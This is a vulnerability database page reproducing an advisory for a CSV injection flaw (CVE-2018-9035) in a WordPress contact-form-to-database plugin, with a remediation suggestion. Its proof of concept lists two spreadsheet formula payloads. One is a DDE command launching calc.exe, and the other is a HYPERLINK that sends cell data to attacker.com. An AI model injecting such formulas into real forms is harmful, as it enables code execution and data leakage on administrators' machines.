Vulners
Lucene search
WordPress Plugin Contact Form 7 to Database Extension 2.10.32 - CSV Injection
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Wordpress Contact Form 7 to Database Extension 2.10.32 Plugin - CSV Injection Vulnerability | 30 Mar 201800:00 | – | zdt |
 | CVE-2018-9035 | 4 Apr 201819:29 | – | attackerkb |
 | CVE-2018-9035 | 22 Jun 202515:00 | – | circl |
 | Wordpress Contact Form 7 to Database Extension Plugin CSV Injection Vulnerability | 2 Apr 201800:00 | – | cnvd |
 | CVE-2018-9035 | 4 Apr 201819:00 | – | cve |
 | CVE-2018-9035 | 4 Apr 201819:00 | – | cvelist |
 | EUVD-2018-20639 | 7 Oct 202500:30 | – | euvd |
 | WordPress Plugin Contact Form 7 to Database Extension 2.10.32 - CSV Injection | 30 Mar 201800:00 | – | exploitpack |
 | CVE-2018-9035 | 4 Apr 201819:29 | – | nvd |
 | WordPress Contact Form 7 To Database Extension 2.10.32 CSV Injection | 31 Mar 201800:00 | – | packetstorm |
10
# Exploit Title : Contact Form 7 to Database Extension Wordpress Plugin CSV Injection
# Date: 23-03-2018
# Exploit Author : Stefan Broeder
# Contact : https://twitter.com/stefanbroeder
# Vendor Homepage: None
# Software Link: https://wordpress.org/plugins/contact-form-7-to-database-extension
# Version: 2.10.32
# CVE : CVE-2018-9035
# Category : webapps
Description
===========
Contact Form 7 to Database Extension is a WordPress plugin with more than 400.000 active installations. Development is discontinued since 1 year. Version 2.10.32 (and possibly previous versions) are affected by a CSV Injection vulnerability.
Vulnerable part of code
=======================
File: contact-form-7-to-database-extension/ExportToCsvUtf8.php:135 prints value of column without checking if it contains a spreadsheet formula.
Impact
======
Arbitrary formulas can be injected into CSV/Excel files.
This can potentially lead to remote code execution at the client (DDE) or data leakage via maliciously injected hyperlinks.
Proof of Concept
============
In order to exploit this vulnerability, the attacker needs to insert an Excel formula into any of the contact form fields available. This will end up in the log, and if a WordPress administrator chooses to export this log as Excel/CSV file, the file will contain the formula. If he then opens the file, the formula will be calculated.
Example:
=cmd|'/C calc.exe'!Z0
or
=HYPERLINK("http://attacker.com/leak?="&A1&A2, "Click to load more data!")
Solution
========
The plugin should escape fields starting with '=' when it exports data to CSV or Excel formats.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Mar 2018 00:00Current
9.3High risk
Vulners AI Score9.3
CVSS 26.8
CVSS 39.6
EPSS0.08414